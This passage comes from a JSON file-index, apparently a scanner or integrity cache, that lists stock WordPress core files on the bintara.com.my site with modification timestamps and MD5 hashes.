norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-pointer-rtl.css\":{\"d\":1526297426,\"h\":\"e186e8b2e5b4ad9ef0a083ca5886e1d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-auth-check-rtl.css\":{\"d\":1540175680,\"h\":\"242281bf85fdfc3d237f7538719f0af0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/media-views.min.css\":{\"d\":1540175680,\"h\":\"f884a49215e3b86f5b00b70357048349\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/admin-bar-rtl.css\":{\"d\":1506707030,\"h\":\"c2c292b337230f342125bc7488b38bcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/editor.css\":{\"d\":1542009950,\"h\":\"049a4b5288c49f627f02b150bc28a8be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-pointer.min.css\":{\"d\":1539044566,\"h\":\"1663817600108d76e57fbcb708a272f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/jquery-ui-dialog.min.css\":{\"d\":1540175680,\"h\":\"b8a2e9ca1829d1a2f78c21cad088648b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/media-views-rtl.css\":{\"d\":1540175680,\"h\":\"fb3b1ff76a82bbf28c67694645d20343\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-embed-template-ie.min.css\":{\"d\":1503164448,\"h\":\"377b5750db4cf37b4897d918a90749e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/buttons.min.css\":{\"d\":1540175680,\"h\":\"8b2bbab9de38118eff72be3474a6f66e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-auth-check.css\":{\"d\":1540175680,\"h\":\"07fbdbde3eec108e5709caa94402475f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/editor.min.css\":{\"d\":1542009950,\"h\":\"e68c7549dca30ee2b36ec0e3eb6f60db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/customize-preview.css\":{\"d\":1540175680,\"h\":\"27b10ba4bbd6ab877d3aefa45d9bb779\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/jquery-ui-dialog.css\":{\"d\":1540175680,\"h\":\"717c172fdbaa9843409c603ca7bf5850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Text\\/Diff\\/Engine\\/xdiff.php\":{\"d\":1369508906,\"h\":\"d6b91fc8628a0c0474ad58389a475815\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Text\\/Diff\\/Engine\\/native.php\":{\"d\":1509013374,\"h\":\"af53f6d50c16840d93189e01247fd454\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Text\\/Diff\\/Engine\\/shell.php\":{\"d\":1506972814,\"h\":\"5adeb5d2b61c5f9cd3d14fc86faa5543\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Text\\/Diff\\/Engine\\/string.php\":{\"d\":1445717726,\"h\":\"3a11b1933d17fc4da9c3000cacef6929\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Text\\/Diff\\/Renderer\\/inline.php\":{\"d\":1266533726,\"h\":\"880ae56e35b150b4b2c7e9d94227e81e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Text\\/Diff\\/Renderer.php\":{\"d\":1435496244,\"h\":\"fc8720df4330b50f59374fdc40d94753\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/Text\\/Diff.php\":{\"d\":1435496244,\"h\":\"6c70d59e9e9a6e9bd11537719313e32a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-client.php\":{\"d\":1472240314,\"h\":\"51c4a34bce41cfb25dda8e75850e5951\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-date.php\":{\"d\":1472240314,\"h\":\"8aca0e3dff273d632ed8a7861ca16967\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-base64.php\":{\"d\":1472240314,\"h\":\"ee2a36d606d508af44b654e6176599bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-request.php\":{\"d\":1472240314,\"h\":\"25702e3c8d53c7a1ea99d47a31cfa204\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-message.php\":{\"d\":1520530000,\"h\":\"4338f6e55074b146d1416eff55db7078\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-value.php\":{\"d\":1472240314,\"h\":\"03929d66fb3ea8356ccdf86a0066e80c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-error.php\":{\"d\":1472240314,\"h\":\"673622ac95ed755c2733bcb2ad9c628a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-server.php\":{\"d\":1472240314,\"h\":\"91f377af5c147854983e9fca3aa7ff19\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-introspectionserver.php\":{\"d\":1472240314,\"h\":\"325561be77e43cf849779170864f372d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/IXR\\/class-IXR-clientmulticall.php\":{\"d\":1472240314,\"h\":\"af10903340b8ebc353a5050a5face990\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/certificates\\/ca-bundle.crt\":{\"d\":1463155892,\"h\":\"dd1c7bdebdfc411eb8a336e3d758692c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pomo\\/po.php\":{\"d\":1506972814,\"h\":\"508c9d35f7ed0f7742b33d445fc6db0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pomo\\/entry.php\":{\"d\":1447985066,\"h\":\"ed9d811ef0cb13bdc0fa60b8314c8d61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pomo\\/plural-forms.php\":{\"d\":1539825148,\"h\":\"a029da532974c7b30f6f93d8326a3c44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pomo\\/translations.php\":{\"d\":1507071646,\"h\":\"87e463ca1ad8aa0437dc8e07d8e86d7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pomo\\/streams.php\":{\"d\":1447985066,\"h\":\"beac73a17cc41d2d138d3c69f1967080\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/pomo\\/mo.php\":{\"d\":1477487192,\"h\":\"1ae9794ce9ca84552e5e7a332f168f65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/codemirror\\/jshint.js\":{\"d\":1516669722,\"h\":\"9d84f61dfb50fa0321ec52716301cdca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/codemirror\\/htmlhint-kses.js\":{\"d\":1505273928,\"h\":\"eefd81f25baeb66b5bf323634c667b1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/codemirror\\/codemirror.min.css\":{\"d\":1505273928,\"h\":\"a632336ab79ded318dc02844c4faf3b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/codemirror\\/csslint.js\":{\"d\":1509652908,\"h\":\"e1b73b2ee9f94bd0f0cace5f09fd8251\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/codemirror\\/jsonlint.js\":{\"d\":1505273928,\"h\":\"49296679dee36b0c548c2bcaed3cd59f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/codemirror\\/htmlhint.js\":{\"d\":1505273928,\"h\":\"b532ec7cd19faf478c4d740b5035a7ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/codemirror\\/codemirror.min.js\":{\"d\":1505273928,\"h\":\"f2d20913fc0766828268883b66af71ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/thickbox\\/thickbox.css\":{\"d\":1504957484,\"h\":\"69d6aa1f5bafc0d02da2d4470496ea12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/thickbox\\/thickbox.js\":{\"d\":1463990430,\"h\":\"d5d248a8730754587b4224c2d9ad36c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/renderers\\/vimeo.min.js\":{\"d\":1508168272,\"h\":\"4e3e1ef6029d44a9362f7ea746b87994\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/renderers\\/vimeo.js\":{\"d\":1508168272,\"h\":\"5c12dccb796dfc0f9bef9745965cf595\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelement-migrate.js\":{\"d\":1508168272,\"h\":\"3cb6030743925f687ad3043384ed3c37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelementplayer.css\":{\"d\":1503939588,\"h\":\"957da4b922728f725cb6369cc9f28957\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/wp-mediaelement.min.css\":{\"d\":1539044566,\"h\":\"2b5b1702953af1d79db2e16f477fc709\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelementplayer-legacy.min.css\":{\"d\":1503939588,\"h\":\"a7f30f0c309921a487640a98569cba90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/wp-mediaelement.css\":{\"d\":1508185968,\"h\":\"6a350c561385084ca1b185cd812e7f43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelement-migrate.min.js\":{\"d\":1539135686,\"h\":\"3fefcdeb28220a3107a61ca3af3070f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelement-and-player.min.js\":{\"d\":1508168272,\"h\":\"0c279a4de1ca848917f96892e58345d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/wp-mediaelement.js\":{\"d\":1516749818,\"h\":\"e781b3e173836b68d9c9d16e24fe66ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelementplayer.min.css\":{\"d\":1503939588,\"h\":\"3207ef8ba63ea7671e48d937393967e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/wp-mediaelement.min.js\":{\"d\":1539135686,\"h\":\"5d06470c0ac27ec77a1a6352f0558e35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/wp-playlist.js\":{\"d\":1517315202,\"h\":\"b135057e7d04c299ca1e9b7d6055f4ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/wp-playlist.min.js\":{\"d\":1539135686,\"h\":\"5fb749f8adce337f9f303136821bdf5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelement.js\":{\"d\":1508168272,\"h\":\"f3b0e2379715e4ae6d15748d14a6dca1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelementplayer-legacy.css\":{\"d\":1503939588,\"h\":\"c4eb4f7315c64a37361986e2e5d3314e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelement-and-player.js\":{\"d\":1508168272,\"h\":\"bfa6a78578b3e436a00cddf75420469a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mediaelement\\/mediaelement.min.js\":{\"d\":1508168272,\"h\":\"dec8fc8727389a7b012257960f663dff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/moxie.min.js\":{\"d\":1539135686,\"h\":\"68dec65b1e80b2b66994f4700762b65c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/wp-plupload.js\":{\"d\":1504887170,\"h\":\"723a6f72315da6e688f995bd48d4af5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/plupload.min.js\":{\"d\":1539135686,\"h\":\"47d38d462d5fa882a92dbd2b54d5d747\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/license.txt\":{\"d\":1311920976,\"h\":\"751419260aa954499f7abaabaa882bbe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/plupload.js\":{\"d\":1504259926,\"h\":\"dda0aa24705a5218d13e271c8c187cf7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/handlers.js\":{\"d\":1494948522,\"h\":\"7a8494f68ff136d5bf92a075fa61dfe0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/handlers.min.js\":{\"d\":1539135686,\"h\":\"a08d4288293bfbcd0d198f7aa3eda619\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/moxie.js\":{\"d\":1506102048,\"h\":\"8923430da19a35c7b1efc792b681fc9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/plupload\\/wp-plupload.min.js\":{\"d\":1539135686,\"h\":\"7c74a0f866c5dfd1dc9a45474651f6ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/utils\\/form_utils.js\":{\"d\":1494212566,\"h\":\"bf88fc6ca25582825493849f19fa4c69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/utils\\/validate.js\":{\"d\":1525204884,\"h\":\"434cc20c313f6f2b033b84f8fb7b5986\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/utils\\/editable_selects.js\":{\"d\":1494212566,\"h\":\"a14a93897132a4a24927c64a9739ff45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/utils\\/mctabs.js\":{\"d\":1506451548,\"h\":\"eb81a1ec2259f9b1b4933e7855e5ada3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/fullscreen\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"0e31542957a5ced3fb021a641359a902\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/fullscreen\\/plugin.js\":{\"d\":1531812866,\"h\":\"a17103ce4c70991f0751a1df272eac49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/tabfocus\\/plugin.min.js\":{\"d\":1531812866,\"h\":\"5ef8706c50672b8945100bf3bba5ecc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/tabfocus\\/plugin.js\":{\"d\":1531812866,\"h\":\"1f951b112676690e39c4ae9463769a8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/charmap\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"3d42b6ec9f848bb610500d4cf6e2a00c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/charmap\\/plugin.js\":{\"d\":1531812866,\"h\":\"4c3c81756533d703d3bb95ce8f9882a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpeditimage\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"55079e203fbb8913c2f34bd839f9a6dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpeditimage\\/plugin.js\":{\"d\":1531812866,\"h\":\"275361937714babb1b4ed539582be877\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpdialogs\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"eafbb1478981e337981d287474e240b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpdialogs\\/plugin.js\":{\"d\":1396936754,\"h\":\"06f7aecb5bdfa28739eea0a498d15a81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wptextpattern\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"a92e4569e92450776f18e0bb6ddae1b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wptextpattern\\/plugin.js\":{\"d\":1478466514,\"h\":\"bbe31109bb4a2955ac73c0b0ac1e8d8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/paste\\/plugin.min.js\":{\"d\":1531812866,\"h\":\"1216bf3c90d1540a8d29e04f6f9bb7b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/paste\\/plugin.js\":{\"d\":1531812866,\"h\":\"611310a2b7739d0e073cb88153237131\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/directionality\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"884572e84844add444b1c133a61f9a40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/directionality\\/plugin.js\":{\"d\":1531812866,\"h\":\"90a8e01e559f995cb8eb526a8d97e8c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpview\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"b46b7cbc7a3548d8bb28a9ae0b08ed9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpview\\/plugin.js\":{\"d\":1531812866,\"h\":\"eee93d5b9b96842ce7aa67ba2c1c1acd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wplink\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"69dd2736db6e8634bbe44998046c1ec9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wplink\\/plugin.js\":{\"d\":1531812866,\"h\":\"5691e4edf58967ac68ef2a739339159d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/lists\\/plugin.min.js\":{\"d\":1531812866,\"h\":\"f22019286074a87a7191766c89c4cfab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/lists\\/plugin.js\":{\"d\":1531812866,\"h\":\"2044a08452b145970ba8155e0f1e00fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/link\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"da71d62b165ecde69d1b7afb554ebb79\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/link\\/plugin.js\":{\"d\":1531812866,\"h\":\"fbf53969b19e593f224ffab41eeaf4fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpgallery\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"04fb37608ef94f9a747901b2f98b4fce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpgallery\\/plugin.js\":{\"d\":1446903748,\"h\":\"9d48345044e6111fbeb9d2fb444d5c49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/textcolor\\/plugin.min.js\":{\"d\":1531812866,\"h\":\"d5da6dc53df2bff42ff9155d426a1794\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/textcolor\\/plugin.js\":{\"d\":1531812866,\"h\":\"03c6de7649cd96f85b56ff3e3e02e6be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/compat3x\\/css\\/dialog.css\":{\"d\":1469542170,\"h\":\"e5313168fb2b657a4bd2f5e06b931a22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/compat3x\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"4c927b02ec9bc57017eab8d7b6dcd2a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/compat3x\\/plugin.js\":{\"d\":1525204884,\"h\":\"2bdb6ec1c3d931d9ecbb169fcf6f5662\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/hr\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"0911253e82299afa85c2950c033bb68f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/hr\\/plugin.js\":{\"d\":1531812866,\"h\":\"fd7ae993f8817e35a0caabd6c0744ac0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpautoresize\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"8607e87dcbb351d067d1a54485e8a357\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpautoresize\\/plugin.js\":{\"d\":1428529288,\"h\":\"640cbc0058638c4fb0400370dbcf25a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/image\\/plugin.min.js\":{\"d\":1531812866,\"h\":\"92889d5f994a6864a8235e5d426c1e73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/image\\/plugin.js\":{\"d\":1531812866,\"h\":\"5756a9cf36da2f719f90edaeb64f73f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wordpress\\/plugin.min.js\":{\"d\":1542794328,\"h\":\"b7d6f9102a09ce8f774d7cf359a70db3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wordpress\\/plugin.js\":{\"d\":1542794328,\"h\":\"57aaf03ff9d4a85d6694c3c2d272195a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpemoji\\/plugin.min.js\":{\"d\":1539135686,\"h\":\"c6cc2ce4842cf34494b20855418ec7ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/wpemoji\\/plugin.js\":{\"d\":1457577568,\"h\":\"f77a6131c150653ddfa17a568a1962d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/colorpicker\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"cdb6a59abe551818e8a3a6d61b68e00e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/colorpicker\\/plugin.js\":{\"d\":1531812866,\"h\":\"fc025b0a68f5ac5cfb7af7d9aebbeaf2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/media\\/plugin.min.js\":{\"d\":1525204884,\"h\":\"111e5c52d4d0f2d41fc16f65884954bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/plugins\\/media\\/plugin.js\":{\"d\":1531812866,\"h\":\"611679cf46c9710355e58818e6c9937f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/themes\\/inlite\\/theme.min.js\":{\"d\":1531812866,\"h\":\"68c854763f6bd132b1cc20f6e0d1e970\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/themes\\/inlite\\/theme.js\":{\"d\":1531812866,\"h\":\"1fb22dab6ed32deabfed237aad759e24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/themes\\/modern\\/theme.min.js\":{\"d\":1531812866,\"h\":\"7a36834309f0b8ef510bccb53d832943\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/themes\\/modern\\/theme.js\":{\"d\":1531812866,\"h\":\"0cd9fdee0a27d28e107936ef56e4e24f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/tinymce-small.eot\":{\"d\":1453254514,\"h\":\"12d26c285b71d790f4b0c94423ef1f99\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/tinymce-small.ttf\":{\"d\":1453254514,\"h\":\"28806940c647cf671bebf4ae0630e570\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/tinymce-small.woff\":{\"d\":1453254514,\"h\":\"7e0c88f02dcaf2f78c90b4dc7827b709\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/tinymce.woff\":{\"d\":1525204884,\"h\":\"9267f79bc730290c6e2c90f9353d3ccf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/tinymce.eot\":{\"d\":1525204884,\"h\":\"6401227790b9e544ef6b8d749cd0a358\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/fonts\\/tinymce.ttf\":{\"d\":1525204884,\"h\":\"f8d2925604a55d7b8604a9875b8e70d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/skin.min.css\":{\"d\":1540179340,\"h\":\"55d1c98c7185470d72930e7690f9168c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/content.min.css\":{\"d\":1531812866,\"h\":\"0be8f6d47b7eb85f49cbb5b54feb4b40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/lightgray\\/content.inline.min.css\":{\"d\":1531812866,\"h\":\"0de56511864c9de2a5cdb878010fc550\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/skins\\/wordpress\\/wp-content.css\":{\"d\":1531812866,\"h\":\"8091ca12bafbea286c007455dd00ed62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/langs\\/wp-langs-en.js\":{\"d\":1418715444,\"h\":\"08f8669f7453b17563a62e6bbb376137\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/tiny_mce_popup.js\":{\"d\":1506451548,\"h\